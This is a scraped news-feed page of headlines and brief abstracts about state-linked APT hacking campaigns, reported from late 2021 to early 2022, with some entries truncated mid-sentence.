Deciphering Moses Staff APT’s Persistent Attacks Against Israeli Organizations Full Text
Abstract
As per a new update shared by Cybereason Nocturnus Team, the APT group has made improvements in tactics and techniques to target several organizations located across Italy, India, Germany, China, Turkey, the UAE, and the U.S.Cyware Alerts - Hacker News
February 15, 2022
TA2541: APT Has Been Shooting RATs at Aviation for Years Full Text
Abstract
Since 2017, the attacker has flung simple off-the-shelf malware in malicious email campaigns aimed at aviation, aerospace, transportation and defense.Threatpost
February 11, 2022
Molerats APT Strikes Again with New NimbleMamba Malware Full Text
Abstract
Researchers from Proofpoint spotted a new phishing campaign that targeted multiple Middle Eastern governments, foreign-policy think tanks, and a state-affiliated airline, with the new NimbleMamba trojan. NimbleMamba is believed to share some similarities with Molerats’ previous executable LastConn ... Read MoreCyware Alerts - Hacker News
February 09, 2022
Russian APT Hackers Used COVID-19 Lures to Target European Diplomats Full Text
Abstract
The Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a series of spear-phishing campaigns mounted in October and November 2021. According to ESET's T3 2021 Threat Report shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the foothold to drop additional malware for gathering information about the hosts and other machines in the same network. Also tracked under the names The Dukes, Cozy Bear, and Nobelium, the advanced persistent threat group is an infamous cyber-espionage group that has been active for more than a decade, with its attacks targeting Europe and the U.S., before it gained widespread attention for the supply‐chain compromise of SolarWinds, leading to further infections in several downstream entities, including U.S. government agencies in 2020. The spear-phishing attacks commenced with a COVIThe Hacker News
February 8, 2022
Chinese APT Actor Stayed Hidden for 250 Days Full Text
Abstract
The xPack backdoor allowed the threat actors to remotely run WMI commands, interact with SMB shares to transfer files, and browse the web by using the backdoor as a proxy to hide their IP addresses.Cyware Alerts - Hacker News
February 7, 2022
MuddyWater APT Associated with Recent Attacks on Turkey Full Text
Abstract
Iranian MuddyWater APT has reportedly launched fresh attacks targeting the users in the Turkish government and other private organizations in the country. Hackers lure victims via maldocs that masquerade as genuine documents from the Turkish Health and Interior Ministries. Targeted organizatio ... Read MoreCyware Alerts - Hacker News
February 7, 2022
APT27 Group Targets German Organizations with HyperBro Full Text
Abstract
Researchers warned against ongoing attacks by China-backed APT27 hacking group that has been targeting commercial organizations in Germany. The goal of the campaign seems to be stealing sensitive information and targeting victims' customers in supply chain attacks. The intelligence agen ... Read MoreCyware Alerts - Hacker News
February 7, 2022
Russian Gamaredon APT is targeting Ukraine since October Full Text
Abstract
Russia-linked APT group Gamaredon is behind spear-phishing attacks against Ukrainian entities and organizations since October 2021. Russia-linked cyberespionage group Gamaredon (aka Armageddon, Primitive Bear, and ACTINIUM) is behind the spear-phishing...Security Affairs
February 4, 2022
Russia-linked Gamaredon APT targeted a western government entity in Ukraine Full Text
Abstract
The Russia-linked Gamaredon APT group attempted to compromise an unnamed Western government entity in Ukraine. Palo Alto Networks' Unit 42 reported that the Russia-linked Gamaredon APT group attempted to compromise an unnamed Western government entity...Security Affairs
February 3, 2022
Antlion APT group used a custom backdoor that allowed them to fly under the radar for months Full Text
Abstract
A China-linked APT group tracked as Antlion used a custom backdoor called xPack that was undetected for months. A China-linked APT group tracked as Antlion is using a custom backdoor called xPack in attacks aimed at financial organizations and manufacturing...Security Affairs
February 2, 2022
Experts warn of a spike in APT35 activity and a possible link to Memento ransomware op Full Text
Abstract
The Cybereason Nocturnus Team reported a spike in the activity of the Iran-linked APT group APT35 (aka Phosphorus or Charming Kitten). The Cybereason Nocturnus Team observed a spike in the activity of the Iran-linked APT group APT35 (aka...Security Affairs
February 01, 2022
Cyberspies linked to Memento ransomware use new PowerShell malware Full Text
Abstract
An Iranian state-backed hacking group tracked as APT35 (aka Phosphorus or Charming Kitten) is now deploying a new backdoor called PowerLess and developed using PowerShell.BleepingComputer
February 1, 2022
Iran-linked MuddyWater APT group campaign targets Turkish entities Full Text
Abstract
The Iran-linked MuddyWater APT group is targeting private Turkish organizations and governmental institutions. Researchers from Cisco Talos have uncovered a cyber espionage campaign carried out by the Iran-linked MuddyWater APT group (aka SeedWorm and TEMP.Zagros) and...Security Affairs
January 28, 2022
Lazarus APT Uses Windows Update to Spew Malware Full Text
Abstract
The group once again dangled fake job opportunities at engineers in a spear-phishing campaign that used Windows Update as a living-off-the-land technique and GitHub as a C2.Threatpost
January 27, 2022
North Korea-linked Lazarus APT used Windows Update client and GitHub in recent attacks Full Text
Abstract
North Korea-linked Lazarus APT group uses Windows Update client to deliver malware on Windows systems. North Korea-linked Lazarus APT started using Windows Update to execute the malicious payload and GitHub as a command and control server in recent...Security Affairs
January 27, 2022
Russian APT29 hackers’ stealthy malware undetected for years Full Text
Abstract
Hackers associated with the Russian Federation Foreign Intelligence Service (SVR) continued their incursions on networks of multiple organizations after the SolarWinds supply-chain compromise using two recently discovered sophisticated threats.BleepingComputer
January 26, 2022
German intelligence agency warns of China-linked APT27 targeting commercial organizations Full Text
Abstract
The BfV German domestic intelligence services warn of ongoing attacks carried out by the China-linked APT27 cyberespionage group. The Bundesamt für Verfassungsschutz (BfV) federal domestic intelligence agency warns of ongoing attacks coordinated...Security Affairs
January 26, 2022
German govt warns of APT27 hackers backdooring business networks Full Text
Abstract
The BfV German domestic intelligence services (short for Bundesamt für Verfassungsschutz) warn of ongoing attacks coordinated by the APT27 Chinese-backed hacking group.BleepingComputer
January 25, 2022
Molerats APT Group Targets the Middle East Full Text
Abstract
ThreatLabz exposed cyberespionage group Molerats that has been leveraging cloud services, such as Google Drive and Dropbox, to host payloads to target the Middle East. The targets picked by the attackers included important members of the banking sector in Palestine, human rights activists/journali ... Read MoreCyware Alerts - Hacker News
January 24, 2022
MoleRats APT Launches Spy Campaign on Bankers, Politicians, Journalists Full Text
Abstract
State-sponsored cyberattackers are using Google Drive, Dropbox and other legitimate services to drop spyware on Middle-Eastern targets and exfiltrate data.Threatpost
January 22, 2022
Stealthy firmware bootkit leveraged by APT in targeted attacks Full Text
Abstract
Kaspersky researchers have uncovered the third known case of a firmware bootkit in the wild. Dubbed MoonBounce, this malicious implant is hidden within Unified Extensible Firmware Interface (UEFI) firmware.Help Net Security
January 21, 2022
BlueNoroff APT Group Eyeing Crypto Startups Full Text
Abstract
A North Korea-linked APT group has been spotted targeting cryptocurrency startups worldwide with fake MetaMask browser extensions to steal cryptocurrency from users' wallets. The attackers work around a complex infrastructure, including various exploits and malware implants to target victims. Organ ... Read MoreCyware Alerts - Hacker News
January 21, 2022
MoonBounce UEFI implant spotted in a targeted APT41 attack Full Text
Abstract
Researchers have spotted China-linked APT41 cyberespionage group using a UEFI implant, dubbed MoonBounce, to maintain persistence. Kaspersky researchers spotted the China-linked APT41 cyberespionage group using a UEFI implant, dubbed MoonBounce,...Security Affairs
January 21, 2022
Molerats APT Targets Users in the Middle East in New Attacks Using .NET Backdoor Full Text
Abstract
ThreatLabz researchers observed several similarities in the C2 communication and .NET payload between this campaign and the previous campaigns attributed to the Molerats APT group.Zscaler
January 20, 2022
New MoonBounce UEFI malware used by APT41 in targeted attacks Full Text
Abstract
Security analysts have discovered and linked MoonBounce, "the most advanced" UEFI firmware implant found so far in the wild, to the Chinese-speaking APT41 hacker group (also known as Winnti).BleepingComputer
January 17, 2022
Kyiv blames Belarus-linked APT UNC1151 for recent cyberattack Full Text
Abstract
Ukrainian government attributes the recent attacks against tens of Ukrainian government websites to Belarusian APT group UNC1151. The government of Kyiv attributes the defacement of tens of Ukrainian government websites to Belarusian APT group UNC1151,...Security Affairs
January 14, 2022
North Korea-linked APT BlueNoroff focuses on crypto theft Full Text
Abstract
The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask browser extensions. The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask...Security Affairs
January 13, 2022
North Korean APTs Stole ~$400M in Crypto in 2021 Full Text
Abstract
Meanwhile, EtherumMax got sued over an alleged pump-and-dump scam after using celebs like Floyd Mayweather Jr. & Kim Kardashian to promote EMAX Tokens.Threatpost
January 13, 2022
US Military Ties Prolific MuddyWater Cyberespionage APT to Iran Full Text
Abstract
US Cyber Command linked the group to Iranian intelligence and detailed its multi-pronged, increasingly sophisticated suite of malware tools.Threatpost
January 13, 2022
USCYBERCOM: MuddyWater APT is linked to Iran’s MOIS intelligence Full Text
Abstract
US Cyber Command (USCYBERCOM) has officially linked the Iran-linked MuddyWater APT group to Iran's Ministry of Intelligence and Security (MOIS). USCYBERCOM has officially linked the Iran-linked MuddyWater APT group (aka SeedWorm and TEMP.Zagros)...Security Affairs
January 12, 2022
Iran-linked APT35 group exploits Log4Shell flaw to deploy a new PowerShell backdoor Full Text
Abstract
Iran-linked APT35 group has been observed leveraging the Log4Shell flaw to drop a new PowerShell backdoor. Iran-linked APT35 cyberespionege group (aka 'Charming Kitten' or 'Phosphorus') has been observed leveraging the Log4Shell flaw to drop a new PowerShell...Security Affairs
January 10, 2022
Indian-linked Patchwork APT infected its own system revealing its ops Full Text
Abstract
The India-linked threat actor Patchwork infected one of their own computers with its RAT revealing its operations to researchers. An India-linked threat actor, tracked as Patchwork (aka Dropping Elephant), employed a new variant of the BADNEWS backdoor,...Security Affairs
January 09, 2022
BADNEWS! Patchwork APT Hackers Score Own Goal in Recent Malware Attacks Full Text
Abstract
Threat hunters have shed light on the tactics, techniques, and procedures embraced by an Indian-origin hacking group called Patchwork as part of a renewed campaign that commenced in late November 2021, targeting Pakistani government entities and individuals with a research focus on molecular medicine and biological science. "Ironically, all the information we gathered was possible thanks to the threat actor infecting themselves with their own [remote access trojan], resulting in captured keystrokes and screenshots of their own computer and virtual machines," Malwarebytes Threat Intelligence Team said in a report published on Friday. Prominent victims that were successfully infiltrated include Pakistan's Ministry of Defense, National Defence University of Islamabad, Faculty of Bio-Sciences at UVAS Lahore, International Center for Chemical and Biological Sciences (ICCBS), H.E.J. Research Institute of Chemistry, and the Salim Habib University (SBU). Believed to have bThe Hacker News
January 9, 2022
APT Groups Registering C2 Domains Way Before Attacks Full Text
Abstract
Recent research claims that 22.3% of aged domain owners may return dangerous outcomes, as these dormant domains are increasingly being misused by attackers.Cyware Alerts - Hacker News
January 6, 2022
North Korea-linked Konni APT targets Russian diplomatic bodies Full Text
Abstract
North Korea-linked APT group Konni targets Russian Federation's Ministry of Foreign Affairs (MID) new versions of malware implants. Security researchers at Cluster25 uncovered a recent campaign carried out by the North Korea-linked Konni APT group...Security Affairs
January 3, 2022
BlackTech APT Pulls Out New Flagpro Malware To Target Japan and Others Full Text
Abstract
NTT Security exposed the China-linked BlackTech espionage group using new Flagpro malware in recent attacks against Japanese companies in the media, defense, and communications industries. The attack begins with a spear-phishing email, which is customized for the targeted organizations. Firms are a ... Read MoreCyware Alerts - Hacker News
December 30, 2021
Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution Full Text
Abstract
A never-before-seen China-based targeted intrusion adversary dubbed Aquatic Panda has been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems. Cybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed "large academic institution." The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors. The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch thrThe Hacker News
December 30, 2021
China-linked APT group Aquatic Panda leverages Log4Shell in recent attack Full Text
Abstract
China-linked APT group Aquatic Panda is exploiting the Log4Shell vulnerability to compromise a large academic institution. China-linked cyberespionage group Aquatic Panda was spotted exploiting the Log4Shell vulnerability (CVE 2021-44228) in an attack...Security Affairs
December 28, 2021
DoubleFeature, post-exploitation dashboard used by Equation Group APT Full Text
Abstract
Researchers analyzed the DoubleFeature logging tool of DanderSpritz Framework that was used by the Equation Group APT group. Check Point researchers have published a detailed analysis of the DoubleFeature tool used to log post-exploitation activities...Security Affairs
December 22, 2021
FBI Warning: APT Groups Exploit Zero-Day in Zoho Application Full Text
Abstract
The FBI warned Zoho users against an authentication bypass flaw, in Zoho’s ManageEngine ServiceDesk Plus, being exploited by APT actors since at least October 2021. Searching on the Shodan search engine for exposed ManageEngine Desktop Central revealed 2,980 systems that might be at risk of attack. ... Read MoreCyware Alerts - Hacker News
December 21, 2021
FBI Sees APTs Exploiting Recent ManageEngine Desktop Central Vulnerability Full Text
Abstract
The Federal Bureau of Investigation (FBI) has released an alert regarding the exploitation of a recent vulnerability, tracked as CVE-2021-44515, in Zoho’s ManageEngine Desktop Central product.Security Week
December 20, 2021
Alleged APT implanted a backdoor in the network of a US federal agency Full Text
Abstract
An alleged APT group planted a backdoor in the network of a U.S. federal government commission associated with international rights. Experts spotted a backdoor in the network of an unnamed U.S. federal government commission associated with international...Security Affairs
December 15, 2021
Iran-linked Seedworm APT targets Telecoms organizations across the Middle East and Asia Full Text
Abstract
Researchers uncovered a new Seedworm campaign targeting telecommunication and IT service providers in the Middle East and Asia. Iran-linked APT group Seedworm (aka MERCURY, MuddyWater, TEMP.Zagros, or Static Kitten) is behind a new cyberespionage...Security Affairs
December 9, 2021
SideCopy APT Targets Indian and Afghan Governments Full Text
Abstract
Researchers discovered that the SideCopy APT group targeted government officials in India and Afghanistan via the new AuTo data stealer for cyberespionage. Hackers use ActionRAT and AuTo Stealer malware in this campaign. Government entities are suggested to invest more in security and stay vig ... Read MoreCyware Alerts - Hacker News
December 7, 2021
Microsoft seized 42 domains used by the China-linked APT15 cyberespionage group Full Text
Abstract
Microsoft seized dozens of malicious domains used by the China-linked APT15 group to target organizations worldwide. Microsoft announced to have obtained a court warrant that allowed it to seize 42 domains used by a China-linked APT15 group (aka Nickel,...Security Affairs
December 7, 2021
Nobelium continues to target organizations worldwide with custom malware Full Text
Abstract
Russia-linked Nobelium APT group is using a new custom malware dubbed Ceeloader in attacks against organizations worldwide. Mandiant researchers have identified two distinct clusters of activity, tracked UNC3004 and UNC2652, that were associated with...Security Affairs
December 06, 2021
Microsoft seizes sites used by APT15 Chinese state hackers Full Text
Abstract
Microsoft seized today dozens of malicious sites used by the Nickel China-based hacking group to target organizations in the US and 28 other countries worldwide.BleepingComputer
December 6, 2021
Nobelium APT targets French orgs, French ANSSI agency warns Full Text
Abstract
The French cyber-security agency ANSSI said that the Russia-linked Nobelium APT group has been targeting French organizations since February 2021. The French national cybersecurity agency ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information)...Security Affairs
December 6, 2021
RTF Template Injection Technique Becomes Popular Among APT Groups Full Text
Abstract
Proofpoint identified three state-sponsored threat actors from India, Russia, and China adopting RTF template injection methods in their phishing campaigns. The adoption of this technique has made attacks from the group much harder to detect and prevent. Therefore, o rganizations are suggested to d ... Read MoreCyware Alerts - Hacker News
December 4, 2021
Determined APT is exploiting ManageEngine ServiceDesk Plus vulnerability Full Text
Abstract
An APT group is leveraging a critical vulnerability (CVE-2021-44077) in Zoho ManageEngine ServiceDesk Plus to compromise organizations in a variety of sectors, including defense and tech.Help Net Security
December 1, 2021
New RTF Template Inject technique used by APT groups in recent attacks Full Text
Abstract
Nation-state actors from China, India, and Russia, were spotted using a novel RTF template injection technique in recent attacks. APT groups from China, India, and Russia have used a new RTF (rich text format) template injection technique in recent...Security Affairs
November 30, 2021
WIRTE APT group targets the Middle East since at least 2019 Full Text
Abstract
A threat actor named WIRTE targets government, diplomatic entities, military organizations, law firms, and financial institutions in Middle East. Cybersecurity researchers from Kaspersky have detailed the activity of a threat actor named WIRTE that...Security Affairs
November 29, 2021
ScarCruft APT Mounts Desktop/Mobile Double-Pronged Spy Attacks Full Text
Abstract
The North Korea-linked group is deploying the Chinotto spyware backdoor against dissidents, journalists and other politically relevant individuals in South Korea.Threatpost
November 29, 2021
APT37 targets journalists with Chinotto multi-platform malware Full Text
Abstract
North Korean state hacking group APT37 targets South Korean journalists, defectors, and human rights activists in watering hole, spear-phishing emails, and smishing attacks delivering malware dubbed Chinotto capable of infecting Windows and Android devices.BleepingComputer
November 26, 2021
APT C-23 Targeting Android Users in Middle East with Spyware Full Text
Abstract
Sophos is warning against an evolved version of an Android spyware, allegedly used by an APT group called C-23, targeting individuals in the Middle East. It spreads via a download link in a text message sent to the target’s phone. Users are requested to a lways update Android OS and applications v ... Read MoreCyware Alerts - Hacker News
November 24, 2021
APT C-23 Hackers Using New Android Spyware Variant to Target Middle East Users Full Text
Abstract
A threat actor known for striking targets in the Middle East has evolved its Android spyware yet again with enhanced capabilities that allow it to be stealthier and more persistent while passing off as seemingly innocuous app updates to stay under the radar. The new variants have "incorporated new features into their malicious apps that make them more resilient to actions by users, who might try to remove them manually, and to security and web hosting companies that attempt to block access to, or shut down, their command-and-control server domains," Sophos threat researcher Pankaj Kohli said in a report published Tuesday. Also known by the monikers VAMP , FrozenCell , GnatSpy , and Desert Scorpion , the mobile spyware has been a preferred tool of choice for the APT-C-23 threat group since at least 2017, with successive iterations featuring extended surveillance functionality to vacuum files, images, contacts and call logs, read notifications from messaging apps, rThe Hacker News
November 18, 2021
US, UK and Australia warn of Iran-linked APTs exploiting Fortinet, Microsoft Exchange flaws Full Text
Abstract
U.S., U.K. and Australia warn that Iran-linked APT groups exploiting Fortinet and Microsoft Exchange flaws to target critical infrastructure. A joint advisory released by government agencies (the FBI, the Cybersecurity and Infrastructure Security...Security Affairs
November 17, 2021
Iran-linked APT groups continue to evolve Full Text
Abstract
The researchers at Microsoft Threat Intelligence Center (MSTIC) are warning of increasingly sophisticated operations carried out by Iranian threat actors. The Microsoft Threat Intelligence Center (MSTIC) shared the results of their analysis on the evolution...Security Affairs
November 12, 2021
Lazarus is Back at it Again Full Text
Abstract
The infamous North Korea state-sponsored Lazarus APT was recently found targeting IT supply chains. Now, the group has been discovered attempting to hack security researchers again.Cyware Alerts - Hacker News
November 11, 2021
An Iranian APT Targets Telcos, ISPs with Upgraded Malware Full Text
Abstract
Lyceum is targeting ISPs and telecommunication operators in Israel, Tunisia, Morocco, and Saudi Arabia. It also attacked a ministry of foreign affairs in Africa. Lyceum uses credential stuffing and brute-force techniques as initial attack vectors. Since its launch, the group has tried and stayed ah ... Read MoreCyware Alerts - Hacker News
November 6, 2021
BlackBerry report highlights initial access broker providing entry to StrongPity APT, MountLocker and Phobos ransomware gangs Full Text
Abstract
A new report from BlackBerry has uncovered an initial access broker called "Zebra2104" that has connections to three malicious cybercriminal groups, some of which are involved in ransomware and phishing.ZDNet
November 5, 2021
Ukraine intelligence doxed 5 FSB Officers that are members of Gamaredon APT Group Full Text
Abstract
Ukraine's premier law enforcement and counterintelligence revealed the real identities of five FSB members behind the Gamaredon cyberespionage group. Ukraine's premier law enforcement and counterintelligence disclosed the real identities of five...Security Affairs
October 30, 2021
Lazarus APT Group Enters the Supply Chain Attack Game Full Text
Abstract
Kaspersky revealed two separate supply chain attacks by Lazarus Group aimed at an IT asset monitoring solution vendor, a South Korean think tank, and the defense industry. H ackers use a Racket downloader (signed with a stolen certificate) in the infection chain. O rganizations must stay alert and ... Read MoreCyware Alerts - Hacker News
October 27, 2021
North Korea-linked Lazarus APT targets the IT supply chain Full Text
Abstract
North Korea-linked Lazarus APT group is extending its operations and started targeting the IT supply chain on new targets. North Korea-linked Lazarus APT group is now targeting also IT supply chain, researchers from Kaspersky Lab warns. The activity...Security Affairs
October 26, 2021
APT trends report released for Q3 2021 Full Text
Abstract
While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering to target organizations or individuals, others refresh their toolsets and extend their scope.Kaspersky Labs
October 25, 2021
Microsoft Defender ATP adds live response for Linux and macOS Full Text
Abstract
Microsoft has announced the addition of new live macOS and Linux response capabilities to Defender for Endpoint, , the enterprise version of Redmond's Windows 10 Defender antivirus.BleepingComputer
October 25, 2021
Russia-linked Nobelium APT targets orgs in the global IT supply chain Full Text
Abstract
Russia-linked Nobelium APT group has breached at least 14 managed service providers (MSPs) and cloud service providers since May 2021. The SolarWinds security breach was not isolated, Russia-linked Nobelium APT group has targeted140 managed service...Security Affairs
October 24, 2021
Telecom Sector Comes Under Attack as New APT Groups Emerge Full Text
Abstract
A new China-linked LightBasin threat actor group emerged as a new threat for telecommunication companies as researchers dug out a string of attacks designed to gather valuable information.Cyware Alerts - Hacker News
October 20, 2021
Geriatric Microsoft Bug Exploited by APT Using Commodity RATs Full Text
Abstract
Disguised as an IT firm, the APT is hitting targets in Afghanistan & India, exploiting a 20-year-old+ Microsoft Office bug that’s as potent as it is ancient.Threatpost
October 20, 2021
Lyceum Group Updates its Arsenal With New Tricks and Tools Full Text
Abstract
The lesser-known Lyceum APT seems to be on a mission to gain a foothold with its re-appearance. The gang has been associated with an attack campaign launched against entities in Tunisia. Similarities between Lyceum and the infamous DNSpionage campaign, a cluster of activity linked to the ... Read MoreCyware Alerts - Hacker News
October 19, 2021
Fresh APT Harvester Reaps Telco, Government Data Full Text
Abstract
The group is likely nation-state-backed and is mounting an ongoing spy campaign using custom malware and stealthy tactics.Threatpost
October 19, 2021
Lyceum APT Returns, This Time Targeting Tunisian Firms Full Text
Abstract
The APT, which targets Middle-Eastern energy firms & telecoms, has been relatively quiet since its exposure but not entirely silent. It’s kept up attacks through 2021 and is working on retooling its arsenal yet again.Threatpost
October 16, 2021
Russia-Linked TA505 targets financial institutions in a new malspam campaign Full Text
Abstract
Russia-linked TA505 group leverages a lightweight Office file to spread malware in a campaign, tracked as MirrorBlast, aimed at financial institutions. Russia-linked APT group TA505 (e.g. Evil Corp) is leveraging a lightweight Office file in a new malware...Security Affairs
October 13, 2021
APT28 Launches Spearphishing Campaign Against Gmail Users: Google Warns Full Text
Abstract
Google warned against phishing attempts by APT28 impacting nearly 14,000 Gmail users, especially activists, journalists, and government officials as they are the key targets of state-sponsored hacks. However, there were no confirmed reports of compromised Gmail accounts.Cyware Alerts - Hacker News
October 13, 2021
Chinese APT IronHusky use Win zero-day in recent wave of attacks Full Text
Abstract
A Chinese-speaking hacking group exploited a Windows zero-day vulnerability in a wave of attacks on defense and IT businesses. A Chinese-speaking hacking group exploited a zero-day vulnerability in the Windows Win32k kernel driver to deploy a new remote...Security Affairs
October 12, 2021
New Iranian APT Targets Aerospace and Telecoms in Western Countries Full Text
Abstract
A cyberespionage operation by MalKamak, an Iran-based hacker group, is targeting aerospace and telecom firms based in the Middle East, Russia, the U.S., and Europe. MalKamak, which uses ShellClient RAT, has targeted only a small number of targets since its alleged inception in 2018. Security team ... Read MoreCyware Alerts - Hacker News
October 12, 2021
Research Links Multiple Attack Campaigns to APT41 Group Full Text
Abstract
Blackberry revealed three phishing schemes by APT41 that were targeting multiple sectors in India using COVID-19-themed phishing baits. Some of the phishing emails included information related to the latest income tax legislation targeting residents not living in India. Security teams need to ... Read MoreCyware Alerts - Hacker News
October 11, 2021
Iran-linked DEV-0343 APT target US and Israeli defense technology firms Full Text
Abstract
DEV-0343: Iran-linked threat actors are targeting US and Israeli defense technology companies leveraging password spraying attacks. Researchers at Microsoft Threat Intelligence Center (MSTIC) and Microsoft Digital Security Unit (DSU) uncovered a malicious...Security Affairs
October 9, 2021
Google Says Russian APT Targeting Journalists, Politicians Full Text
Abstract
Some 14,000 Google users were warned of being suspected targets of Russian government-backed threat actors. Post that, the tech giant announced cybersecurity updates - particularly for email accounts of high-profile users.Gov Info Security
October 8, 2021
Google warns of APT28 attack attempts against 14,000 Gmail users Full Text
Abstract
Google warned more than 14,000 Gmail users that they have been the target of nation-state spear-phishing campaigns. On Wednesday, Google announced to have warned approximately 14,000 Gmail users that they had been targeted by nation-state hackers. Shane...Security Affairs
October 7, 2021
Operation GhostShell: MalKamak APT targets aerospace and telco firms Full Text
Abstract
Operation GhostShell: Threat actors used ShellClient malware in cyberespionage campaigns aimed at companies in the aerospace and telecommunications sectors. Hackers use stealthy ShellClient malware on aerospace, telco firms Cybereason Nocturnus...Security Affairs
October 04, 2021
A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries Full Text
Abstract
A previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks. Cybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang — referring to their chameleellonic capabilities, including disguising "its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google." "To achieve their goal, the attackers used a trending penetration method—supply chain," the researchers said of one of the incidents investigated by the firm. "The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. Using this method […], the ChamelGang group was able to achieve its goal aThe Hacker News
October 4, 2021
New APT ChamelGang Targets energy and aviation companies in Russia Full Text
Abstract
ChamelGang APT is a new cyberespionage group that focuses on fuel and energy organizations and aviation industry in Russia ChamelGang is a new APT group that was first spotted in March by researchers at security firm Positive Technologies, it targets...Security Affairs
September 28, 2021
FamousSparrow APT Launches Worldwide Attack Campaign Full Text
Abstract
FamousSparrow, a new entrant to the cyberespionage space, is reportedly spying on users across multiple sectors, including government, engineering, legal, and hospitality. It is one of the earliest attackers leveraging Microsoft Exchange ProxyLogon vulnerabilities for its attacks. Its victims ar ... Read MoreCyware Alerts - Hacker News
September 28, 2021
Russia-linked Nobelium APT group uses custom backdoor to target Windows domains Full Text
Abstract
Microsoft discovered new custom malware, dubbed FoggyWeb, used by the Nobelium cyberespionage group to implant backdoor in Windows domains. Microsoft Threat Intelligence Center (MSTIC) researchers have discovered a new custom malware, dubbed FoggyWeb...Security Affairs
September 27, 2021
Russian Turla APT Group Deploying New Backdoor on Targeted Systems Full Text
Abstract
State-sponsored hackers affiliated with Russia are behind a new series of intrusions using a previously undocumented implant to compromise systems in the U.S., Germany, and Afghanistan. Cisco Talos attributed the attacks to the Turla advanced persistent threat (APT) group, coining the malware "TinyTurla" for its limited functionality and efficient coding style that allows it to go undetected. Attacks incorporating the backdoor are believed to have occurred since 2020. "This simple backdoor is likely used as a second-chance backdoor to maintain access to the system, even if the primary malware is removed," the researchers said . "It could also be used as a second-stage dropper to infect the system with additional malware." Furthermore, TinyTurla can upload and execute files or exfiltrate sensitive data from the infected machine to a remote server, while also polling the command-and-control (C2) station every five seconds for any new commands. Also kThe Hacker News
September 24, 2021
A New APT Hacker Group Spying On Hotels and Governments Worldwide Full Text
Abstract
A new advanced persistent threat (APT) has been behind a string of attacks against hotels across the world, along with governments, international organizations, engineering companies, and law firms. Slovak cybersecurity firm ESET codenamed the cyber espionage group FamousSparrow , which it said has been active since at least August 2019, with victims located across Africa, Asia, Europe, the Middle East, and the Americas, spanning several countries such as Burkina Faso, Taiwan, France, Lithuania, the U.K., Israel, Saudi Arabia, Brazil, Canada, and Guatemala. Attacks mounted by the group involve exploiting known vulnerabilities in server applications such as SharePoint and Oracle Opera, in addition to the ProxyLogon remote code execution vulnerability in Microsoft Exchange Server that came to light in March 2021, making it the latest threat actor to have had access to the exploit before details of the flaw became public. According to ESET, intrusion exploiting the flaws commenThe Hacker News
September 24, 2021
New FamousSparrow APT group used ProxyLogon exploits in its attacks Full Text
Abstract
Researchers spotted a new cyberespionage group, dubbed FamousSparrow, that used ProxyLogon exploits to target hotels worldwide. Researchers from ESET discovered a new cyberespionage group, tracked as FamousSparrow, that has been targeting hotels...Security Affairs
September 21, 2021
Turla APT group used a new backdoor in attacks against Afghanistan, Germany and the US Full Text
Abstract
Russia-linked cyber espionage group Turla made the headlines again, the APT has employed a new backdoor in a recent wave of attacks Cisco Talos researchers reported that the Russia-linked Turla APT group recently used a new backdoor, dubbed TinyTurla,...Security Affairs
September 21, 2021
New Warning: APTs are Targeting Zoho ManageEngine Full Text
Abstract
The FBI, CISA, and CGCYBER issued a joint advisory warning against the exploitation of a critical bug in the Zoho ManageEngine ADSelfService Plus software by the nation-state actors. Besides applying a patch, organizations are suggested to baseline the normal behavior in web server logs to spot a w ... Read MoreCyware Alerts - Hacker News
September 16, 2021
CISA, FBI: State-Backed APTs May Be Exploiting Critical Zoho Bug Full Text
Abstract
The newly identified bug in a Zoho single sign-on and password management tool has been under active attack since early August.Threatpost
September 16, 2021
Chinese APT Campaign Stole Data from Victim Organization Using Off-the-shelf Hacking and System Management Tools Full Text
Abstract
The threat actors were able to gain their initial access to the victim by exploiting a vulnerability in a web access server. They further used privilege escalation exploits to steal credentials.Tech Target
September 13, 2021
APT-C-36 Updates Its Long-term Spam Campaign Against South American Entities With Commodity RATs Full Text
Abstract
APT-C-36 has been known to send phishing emails to various entities in South America using publicly available remote access tools (RATs). Over time, the threat actor switches from one RAT to another.Trend Micro
September 10, 2021
Grayfly APT uses recently discovered Sidewalk backdoor Full Text
Abstract
Security researchers from Broadcom's Symantec linked a previously undocumented backdoor to the Chinese Grayfly operation. Experts from Broadcom's Symantec linked a previously undocumented backdoor to the Chinese Grayfly operation. In late August,...Security Affairs
September 7, 2021
Golden SAML Attack - APT Hackers Hijacking Active Directory Server Full Text
Abstract
After detecting this attack and conducting an investigation, security analysts came to know that this attack operates by a threat actor hijacking, or obtaining access to the AD FS server.GB Hackers
August 29, 2021
SparklingGoblin’s SideWalk Hints Toward the Maker of CrossWalk Full Text
Abstract
The new SideWalk backdoor in a recent campaign by a Chinese APT found sharing multiple similarities with CrossWalk, another backdoor used by the group. SideWalk and CrossWalk share a resemblance in anti-tampering techniques, threading model, data layout, and the way data is managed during the ... Read MoreCyware Alerts - Hacker News
August 27, 2021
FIN8 Targets US Bank With New ‘Sardonic’ Backdoor Full Text
Abstract
The latest refinement of the APT’s BadHatch backdoor can leverage new malware on the fly without redeployment, making it potent and nimble.Threatpost
August 26, 2021
Earth Baku (APT41) Active Target Victims in Indo-Pacific Region Full Text
Abstract
